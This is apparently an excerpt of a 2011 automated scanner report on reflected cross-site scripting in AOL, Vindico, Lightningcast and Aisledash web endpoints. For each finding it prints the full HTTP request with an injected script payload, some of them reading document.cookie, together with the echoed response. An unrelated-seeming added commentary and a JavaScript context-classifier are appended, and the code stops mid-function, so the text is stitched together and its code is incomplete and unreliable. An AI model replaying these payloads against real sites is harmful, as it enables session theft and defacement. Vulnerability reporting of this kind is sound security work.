This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /scores6d396"-alert(1)-"2e6570a7b85 HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=2393099708.3390197069.4049274368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:06 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24843
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld03 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.sports"; s_265.trackExternalLinks="true"; s_265.prop1="scores6d396"-alert(1)-"2e6570a7b85"; s_265.pfxID="spr"; s_265.disablepihost=false; s_265.prop12="http://sports.aol.com/scores6d396\"-alert(1)-\"2e6570a7b85"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_c ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec was submitted in the REST URL parameter 1. This input was echoed as 35d9f--><img src=a onerror=alert(1)>cac995bf9ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /scores35d9f--><img%20src%3da%20onerror%3dalert(1)>cac995bf9ec HTTP/1.1
Host: sports.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.320032077.861537792; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:11:08 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 24952
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld04 --> <html xmlns="http://www.w3.org/1999/xhtml" xml: ...[SNIP]... <!--req:101x1_1.us.sports20.scores35d9f--><img src=a onerror=alert(1)>cac995bf9ec.broadband ad:none (recursion blocked at default(mn=0)) --> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a695d<script>alert(1)</script>02c8710ec0a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sw/a?callback=parseSLa695d<script>alert(1)</script>02c8710ec0a&sch=afc-weblogs-xml&ssch=autoblog_2009&surl=http%3A//www.autoblog.com/%3Fb6c46%2522-alert%28document.cookie%29-%25228a56f02ab0f%3D1&snum=6&of=js&rv=1.3&shints=automobile HTTP/1.1
Host: switcher.dmn.aol.com
Proxy-Connection: keep-alive
Referer: http://www.autoblog.com/?b6c46%22-alert(document.cookie)-%228a56f02ab0f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:28:41 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 3342
Content-Length: 3342
1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://syndication.mmismm.com
Path: /mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f89'%3balert(1)//89b3aef460a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69f89';alert(1)//89b3aef460a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mmtnt.php?69f89'%3balert(1)//89b3aef460a=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 21:52:52 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Sun, 07-Feb-2016 03:52:52 GMT; path=/; domain=.mmismm.com
Content-Length: 493
Content-Type: text/javascript
The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload d748a<script>alert(1)</script>483d9c82222 was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567d748a<script>alert(1)</script>483d9c82222&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:11 GMT
Expires: Sun, 06 Feb 2011 20:38:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=KOKDELMCNDFPCJFLBIEHNFFB; path=/
X-Powered-By: ASP.NET
Content-Length: 1000
Connection: keep-alive
The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 9f9f9<script>alert(1)</script>58e0364ee35 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=200319f9f9<script>alert(1)</script>58e0364ee35&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:14 GMT
Expires: Sun, 06 Feb 2011 20:38:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQTRADB=BJFKINMCIAFIFOKPEBOLGODF; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive
The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 3872b<script>alert(1)</script>508553eaf6f was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=60353872b<script>alert(1)</script>508553eaf6f&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:08 GMT
Expires: Sun, 06 Feb 2011 20:38:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTQSBDB=ABKFHBNCCDOGEAKPCMKCCBHA; path=/
X-Powered-By: ASP.NET
Content-Length: 996
Connection: keep-alive
The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 6e2c7<script>alert(1)</script>ecfd5510463 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=18046e2c7<script>alert(1)</script>ecfd5510463&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAQRAADB=AMBBLJHDLNPJPAHAJKBIOLFH; path=/
X-Powered-By: ASP.NET
Content-Length: 997
Connection: keep-alive
The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 2f6c5<script>alert(1)</script>9b9dc606334 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=444182f6c5<script>alert(1)</script>9b9dc606334&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=AMKDELMCPLOBBHMIPCAAEIPL; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 30f97<script>alert(1)</script>daaff63cbfb was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlets/getPlaylist?ver=2.0&client=fcas3_1.12.2.2.BETA.AOL&fv=WIN%2010,1,103,22&attr=[Domain,fanhouse.com][Autoplay,false][adamid,none]&baudit=server&tname=AutoplayOff&crlen=t&nwid=278524&content=NO_VIDEO_URL&format=Video-Flash-400-400x300&regions=StandardBanner&uid=95293821230f97<script>alert(1)</script>daaff63cbfb&level=Sports:nfl&audit=param&resp=SMIL&pu=http%3A//www.fanhouse.com/%3Ff9308%2522-alert%28document.cookie%29-%2522caa87257aff%3D1 HTTP/1.1
Host: web.lightningcast.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=295&flashID=myaolExperience&bgcolor=%23FFFFFF&playerID=43942763001&publisherID=1612833736&isVid=true&isUI=true&autoStart=false&%40videoList=64092604001&wmode=transparent
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:47 GMT
Server: Apache/2.2.6 (Fedora)
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Connection: close
P3P: policyref="http://web.lightningcast.net/w3c/p3p.xml",CP="NON DSP COR CURa TAIo PSDo OUR IND PHY DEM STA LOC"
Content-Type: application/smil
Content-Length: 757
The value of the template request parameter is copied into the HTML document as plain text between tags. The payload ff2c5<script>alert(1)</script>dafbfb81510 was submitted in the template parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /modular.jsp?template=1386ff2c5<script>alert(1)</script>dafbfb81510&view=190752&pollId=191044&a... HTTP/1.1
Host: webcenter.polls.aol.com
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/?f9308%22-alert(document.cookie)-%22caa87257aff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
The value of the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f0d"><script>alert(1)</script>6f15c085aa8 was submitted in the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8 HTTP/1.1 Host: www.aisledash.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1297023866964-New%7C1360095866964%3B%20s_nrgvo%3DNew%7C1360095867077%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.aisledash.com/?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8" /> ...[SNIP]...
1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.aisledash.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3418b"><script>alert(1)</script>3224aeef255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3418b"><script>alert(1)</script>3224aeef255=1 HTTP/1.1 Host: www.aisledash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.aisledash.com/?3418b"><script>alert(1)</script>3224aeef255=1" /> ...[SNIP]...
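The "Issue detail" sentences in this report (issue 1.229 above is typical) state which syntactic context the submitted marker landed in: text between tags, a double-quoted attribute value, or a double-quoted JavaScript string. That judgement decides which follow-up payload is tried. The function below is an added example, not scanner code and not part of the original report, that makes the same judgement over a response body. The sample bodies are constructed here from fragments the report prints; the marker strings are the report's own. It deliberately does not model JavaScript comments or regex literals, so treat its answer for script content as a first pass.

```javascript
// Added example (not from the scan report): classify where a reflected marker
// landed, the way the report's "Issue detail" sentences do.

function classifyReflection(body, marker) {
  const at = body.indexOf(marker);
  if (at < 0) return { context: 'not_reflected', quote: null };
  const before = body.slice(0, at);

  // Inside a <script> element if more openers than closers precede the marker.
  const opens  = (before.match(/<script\b[^>]*>/gi) || []).length;
  const closes = (before.match(/<\/script\s*>/gi) || []).length;
  if (opens > closes) {
    // Walk the script text from its last opener, tracking string state.
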